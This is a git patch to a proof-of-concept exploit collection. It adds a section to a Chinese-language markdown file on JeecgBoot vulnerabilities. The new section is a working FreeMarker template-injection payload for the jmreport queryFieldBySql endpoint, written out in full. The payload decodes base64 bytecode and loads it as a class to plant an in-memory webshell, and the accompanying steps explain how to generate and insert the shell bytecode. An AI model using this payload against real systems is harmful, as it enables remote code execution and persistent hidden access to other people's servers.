From f8dd5d2ca6ef122daba67c985cfaa916abcbcfe6 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 29 Jun 2024 01:29:47 +0800
Subject: [PATCH] =?UTF-8?q?Update=20JeecgBoot=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 "JeecgBoot\346\274\217\346\264\236.md" | 13 +++++++++++++
 1 file changed, 13 insertions(+)
diff --git "a/JeecgBoot\346\274\217\346\264\236.md" "b/JeecgBoot\346\274\217\346\264\236.md"
index 29214f72..3de9765f 100644
--- "a/JeecgBoot\346\274\217\346\264\236.md"
+++ "b/JeecgBoot\346\274\217\346\264\236.md"
@@ -13,6 +13,19 @@ Content-Length: 123
 {"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"open -a calculator.app \") }' "}
 ```
+## queryFieldBySql 注入内存马
+```
+{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
+```
+使用内存马工具生成payload,将生成的base64格式的内存马 替换payload 中bytecodeBase64的值
+
+![image](https://github.com/wy876/POC/assets/139549762/55a9877c-c111-4897-a665-8f58e9de5300)
+
+![image](https://github.com/wy876/POC/assets/139549762/03a476fa-7d2a-4221-9c96-c5b60040adfd)
+
+![image](https://github.com/wy876/POC/assets/139549762/24b6b0b2-419c-43d1-a0c8-8ced440e0a79)
+
+内存马路径:`http://192.168.18.131:8080/jeecg-boot/jmreport/queryFieldBySql/`
 ## JeecgBoot SSTI 漏洞
 ```